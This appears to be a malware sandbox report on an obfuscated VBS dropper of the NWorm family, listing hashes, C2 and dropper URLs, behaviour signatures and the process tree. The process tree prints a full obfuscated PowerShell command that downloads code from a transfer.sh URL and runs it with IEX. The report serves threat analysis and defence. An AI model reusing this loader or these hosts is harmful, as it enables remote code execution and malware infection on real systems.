nworm | 8c4477fd5129d549aabcbbcab1950965f7f0e0c934a60043dc7d27e57252868f

General

Target

YBAXAKQXVYWIXQJDE.vbs
Size

9KB
MD5

40f92eb4b46a3430167477d11dec4c9e
SHA1

515ad5cac3f5b9ed1e7a7e14d53a191a12193984
SHA256

8c4477fd5129d549aabcbbcab1950965f7f0e0c934a60043dc7d27e57252868f
SHA512

80de7c828aff509a8d0ddbee61f52ed1ade6a3b562f2aa51082eae7c1631fcdf58d375b94457261481b1a8bfc90033e275444d7f765dff7c0c6d99635408989e

Score

10^/10

nworm downloader worm

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://transfer.sh/get/8J0O0I/Server435.txt

Extracted

Family

nworm

Version

v0.3.8

C2

nyanwmoney.duckdns.org:8891

Mutex

594274bc

Signatures

NWorm
A TrickBot module used to propagate to vulnerable domain controllers.
worm downloader nworm

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2484	1372	POWERSHELL.exe	80

Blocklisted process makes network request 1 IoCs

flow	pid	Process
8	2484	POWERSHELL.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 4348 set thread context of 4284	4348	powershell.exe	84

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
2484	POWERSHELL.exe
2484	POWERSHELL.exe
4348	powershell.exe
4348	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2484	POWERSHELL.exe
Token: SeDebugPrivilege	4348	powershell.exe

Suspicious use of WriteProcessMemory 10 IoCs

description	pid	Process	procid_target
PID 2484 wrote to memory of 4348	2484	POWERSHELL.exe	83
PID 2484 wrote to memory of 4348	2484	POWERSHELL.exe	83
PID 4348 wrote to memory of 4284	4348	powershell.exe	84
PID 4348 wrote to memory of 4284	4348	powershell.exe	84
PID 4348 wrote to memory of 4284	4348	powershell.exe	84
PID 4348 wrote to memory of 4284	4348	powershell.exe	84
PID 4348 wrote to memory of 4284	4348	powershell.exe	84
PID 4348 wrote to memory of 4284	4348	powershell.exe	84
PID 4348 wrote to memory of 4284	4348	powershell.exe	84
PID 4348 wrote to memory of 4284	4348	powershell.exe	84

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\YBAXAKQXVYWIXQJDE.vbs"
1⤵
PID:1620

C:\Windows\System32\WindowsPowerShell\v1.0\POWERSHELL.exe
POWERSHELL $Hx = 'https://transfer.sh/get/8J0O0I/Server435.txt';$HB=('{2}{0}{1}' -f')/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_l)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_o)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_a)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_d)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_'.Replace(')/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_',''),'67&/!^)!+}&8<^+)3{2*)974\{+@-$$-)53(86+99+558]9*[@7]911\1#1&}8*9#-)[#3#\4{0/52[2&4&#7*%)46(}55$15]-s67&/!^)!+}&8<^+)3{2*)974\{+@-$$-)53(86+99+558]9*[@7]911\1#1&}8*9#-)[#3#\4{0/52[2&4&#7*%)46(}55$15]-t67&/!^)!+}&8<^+)3{2*)974\{+@-$$-)53(86+99+558]9*[@7]911\1#1&}8*9#-)[#3#\4{0/52[2&4&#7*%)46(}55$15]-r67&/!^)!+}&8<^+)3{2*)974\{+@-$$-)53(86+99+558]9*[@7]911\1#1&}8*9#-)[#3#\4{0/52[2&4&#7*%)46(}55$15]-i67&/!^)!+}&8<^+)3{2*)974\{+@-$$-)53(86+99+558]9*[@7]911\1#1&}8*9#-)[#3#\4{0/52[2&4&#7*%)46(}55$15]-n67&/!^)!+}&8<^+)3{2*)974\{+@-$$-)53(86+99+558]9*[@7]911\1#1&}8*9#-)[#3#\4{0/52[2&4&#7*%)46(}55$15]-g67&/!^)!+}&8<^+)3{2*)974\{+@-$$-)53(86+99+558]9*[@7]911\1#1&}8*9#-)[#3#\4{0/52[2&4&#7*%)46(}55$15]-'.Replace('67&/!^)!+}&8<^+)3{2*)974\{+@-$$-)53(86+99+558]9*[@7]911\1#1&}8*9#-)[#3#\4{0/52[2&4&#7*%)46(}55$15]-',''),'%8$5-<0-^+3-/*<1+=62}91=8^*-/!9}99@}4<-#]{<\1#)965=0<}\68+\8#*}6$9^_66]=/-6104=}]0({(/[$@7(#3^<!<}%D%8$5-<0-^+3-/*<1+=62}91=8^*-/!9}99@}4<-#]{<\1#)965=0<}\68+\8#*}6$9^_66]=/-6104=}]0({(/[$@7(#3^<!<}%o%8$5-<0-^+3-/*<1+=62}91=8^*-/!9}99@}4<-#]{<\1#)965=0<}\68+\8#*}6$9^_66]=/-6104=}]0({(/[$@7(#3^<!<}%w%8$5-<0-^+3-/*<1+=62}91=8^*-/!9}99@}4<-#]{<\1#)965=0<}\68+\8#*}6$9^_66]=/-6104=}]0({(/[$@7(#3^<!<}%n%8$5-<0-^+3-/*<1+=62}91=8^*-/!9}99@}4<-#]{<\1#)965=0<}\68+\8#*}6$9^_66]=/-6104=}]0({(/[$@7(#3^<!<}%'.Replace('%8$5-<0-^+3-/*<1+=62}91=8^*-/!9}99@}4<-#]{<\1#)965=0<}\68+\8#*}6$9^_66]=/-6104=}]0({(/[$@7(#3^<!<}%',''));$HBB=('{2}{0}{1}' -f')/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_e)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_b)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_C)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_l)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_'.Replace(')/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_',''),')/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_i)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_e)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_n)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_t)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_'.Replace(')/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_',''),')/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_Ne)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_t)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_.W)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_'.Replace(')/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_',''));$XSZAJXGNTVXKGOTPRJHWCIHRASQAUGABFPPDDYLDBUZUPFYQNSEEYDEHTDNZZCSFRCCYNJSVWVRFJIARKQAHKFABUCJNYFCWGTE=('{2}{0}{1}' -f'-]/3181@7_\]4/3@4/1*^$20<*%_$-}2^)</\7(**(){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<w-O-]/3181@7_\]4/3@4/1*^$20<*%_$-}2^)</\7(**(){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<b-]/3181@7_\]4/3@4/1*^$20<*%_$-}2^)</\7(**(){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<j-]/3181@7_\]4/3@4/1*^$20<*%_$-}2^)</\7(**(){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<e-]/3181@7_\]4/3@4/1*^$20<*%_$-}2^)</\7(**(){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<c-]/3181@7_\]4/3@4/1*^$20<*%_$-}2^)</\7(**(){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<t $-]/3181@7_\]4/3@4/1*^$20<*%_$-}2^)</\7(**(){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<H-]/3181@7_\]4/3@4/1*^$20<*%_$-}2^)</\7(**(){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<'.Replace('-]/3181@7_\]4/3@4/1*^$20<*%_$-}2^)</\7(**(){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<',''),'-]/3181@7_\]4/3@4/1*^$20<*%_$-}2^)</\7(**(){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<BB-]/3181@7_\]4/3@4/1*^$20<*%_$-}2^)</\7(**(){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<).$H-]/3181@7_\]4/3@4/1*^$20<*%_$-}2^)</\7(**(){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<B(-]/3181@7_\]4/3@4/1*^$20<*%_$-}2^)</\7(**(){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<$H-]/3181@7_\]4/3@4/1*^$20<*%_$-}2^)</\7(**(){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<x)-]/3181@7_\]4/3@4/1*^$20<*%_$-}2^)</\7(**(){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<'.Replace('-]/3181@7_\]4/3@4/1*^$20<*%_$-}2^)</\7(**(){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<',''),'-]/3181@7_\]4/3@4/1*^$20<*%_$-}2^)</\7(**(){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<I-]/3181@7_\]4/3@4/1*^$20<*%_$-}2^)</\7(**(){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<`E-]/3181@7_\]4/3@4/1*^$20<*%_$-}2^)</\7(**(){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<`X(-]/3181@7_\]4/3@4/1*^$20<*%_$-}2^)</\7(**(){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<Ne-]/3181@7_\]4/3@4/1*^$20<*%_$-}2^)</\7(**(){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<'.Replace('-]/3181@7_\]4/3@4/1*^$20<*%_$-}2^)</\7(**(){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<',''));$HBBBBB = ($XSZAJXGNTVXKGOTPRJHWCIHRASQAUGABFPPDDYLDBUZUPFYQNSEEYDEHTDNZZCSFRCCYNJSVWVRFJIARKQAHKFABUCJNYFCWGTE -Join '')|I`E`X
1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2484
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoE -Nop -NonI -WIndoWSTYLe HiDdeN -ExecutionPolicy Bypass -file C:\ProgramData\PRESFGEQTFRWEEHBFXQXJU\PRESFGEQTFRWEEHBFXQXJU.ps1
  2⤵
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4348
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
    3⤵
    PID:4284

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

memory/2484-130-0x00000172798C0000-0x00000172798E2000-memory.dmp

Filesize
136KB

Download
memory/2484-132-0x0000017279920000-0x0000017279922000-memory.dmp

Filesize
8KB

Download
memory/2484-131-0x00007FFF7A220000-0x00007FFF7ACE1000-memory.dmp

Filesize
10.8MB

Download
memory/2484-133-0x0000017279923000-0x0000017279925000-memory.dmp

Filesize
8KB

Download
memory/2484-134-0x0000017279926000-0x0000017279928000-memory.dmp

Filesize
8KB

Download
memory/4284-142-0x0000000075000000-0x00000000757B0000-memory.dmp

Filesize
7.7MB

Download
memory/4284-141-0x0000000000400000-0x000000000040A000-memory.dmp

Filesize
40KB

Download
memory/4284-143-0x0000000005640000-0x0000000005641000-memory.dmp

Filesize
4KB

Download
memory/4284-144-0x0000000005650000-0x00000000056EC000-memory.dmp

Filesize
624KB

Download
memory/4284-145-0x0000000005CA0000-0x0000000006244000-memory.dmp

Filesize
5.6MB

Download
memory/4284-146-0x0000000005760000-0x00000000057C6000-memory.dmp

Filesize
408KB

Download
memory/4348-137-0x00007FFF7A220000-0x00007FFF7ACE1000-memory.dmp

Filesize
10.8MB

Download
memory/4348-138-0x000002074B970000-0x000002074B972000-memory.dmp

Filesize
8KB

Download
memory/4348-140-0x000002074B976000-0x000002074B978000-memory.dmp

Filesize
8KB

Download
memory/4348-139-0x000002074B973000-0x000002074B975000-memory.dmp

Filesize
8KB

Download
memory/4348-136-0x000002074D2F0000-0x000002074D30A000-memory.dmp

Filesize
104KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads